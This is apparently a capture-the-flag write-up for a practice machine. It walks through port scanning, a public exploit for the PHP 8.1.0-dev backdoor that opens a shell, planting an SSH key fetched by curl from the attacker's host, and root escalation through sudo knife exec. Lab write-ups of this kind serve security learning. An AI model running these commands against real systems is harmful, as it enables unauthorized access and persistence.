Enumeration
I run nmap and found the ports 22 and 80 open.
┌─[]─[user@parrot]─[~] └──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.132.165 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) ┌─[user@parrot]─[~] └──╼ echo $ports 22,80 ┌─[user@parrot]─[~] └──╼ nmap -sC -sV -Pn -p$ports 10.129.132.165 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 14:36 BST Nmap scan report for 10.129.132.165 Host is up (0.049s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA) | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA) |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Emergent Medical Idea |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Because the port 80 is open, I check if there is a web hosted on the machine. There is a web, but doesn’t have anything interesting, just an empty static web.
A directory scan with gobuster reveals one directory, “server-status”, but still nothing interesting.
I use nikto to scan the web and found something interesting, the “X-Powered-By” header is using PHP/8.1.0-dev, that php version was released with a backdoor…
┌─[user@parrot]─[~] └──╼ nikto -h 10.129.132.165 - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 10.129.132.165 + Target Hostname: 10.129.132.165 + Target Port: 80 + Start Time: 2022-05-07 14:44:33 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + Retrieved x-powered-by header: PHP/8.1.0-dev + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details. + 6544 items checked: 0 error(s) and 3 item(s) reported on remote host + End Time: 2022-05-07 14:49:59 (GMT1) (326 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
User flag
With a quick search I found two exploits on GitHub, exploit-1 and exploit-2, I downloaded the first one because it will directly open a reverse shell on the target and seems more simple to use, perfect for my objective.
I cloned the repository and run the script. It worked perfectly, I took the flag and continue with the priv esc.
┌─[user@parrot]─[~/htb/knife/exploits/Exploit-PHP-8.1.0] └──╼ ./php_8.1_rce.sh http://10.129.132.165 Checking if host is vulnerable... Vulnerable --> PHP/8.1.0 [+] Spawning shell $ whoami james $ ls -l /home/james total 4 -r-------- 1 james james 33 May 7 11:56 user.txt $
Root flag
First I upgraded the shell just for commodity reasons. To accomplish this I will generate an ssh key and add it to the “authorized_keys” file of the james user.
# create the ssh key and host a web server ┌─[user@parrot]─[~/htb/knife/files] └──╼ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/user/.ssh/id_rsa): ./id_rsa [...] ┌─[user@parrot]─[~/htb/knife/files] └──╼ python3 -m http.server 8080 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... # on the target download and add the key to the "authorized_keys" file $ curl http://10.10.14.93:8080/id_rsa.pub > /home/james/.ssh/authorized_keys $ # connect to the target using ssh ┌─[]─[user@parrot]─[~/htb/knife/files] └──╼ ssh -i id_rsa james@10.129.132.165 james@knife:~$ whoami james james@knife:~$
I upload linpeas.sh to the machine for a quick enumeration, and quickly found several vulnerabilities:
- Sudo version is vulnerable to priv esc.
- Vulnerable to CVE-2021-4034 (priv esc).
- We can run the command “/usr/bin/knife” with sudo.
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
The first two are very easy to exploit (just download the exploit and run it), so I will be exploring the third one.
I search on google and found that the program knife actually exists.
I search for it on GTFOBins and discover an easy way to priv esc taking advantage of that we can execute it with sudo.
james@knife:~$ sudo knife exec -E 'exec "/bin/sh"' # whoami root # ls -l /root/root.txt -r-------- 1 root root 33 May 7 11:56 /root/root.txt #
And that’s it! I’m root.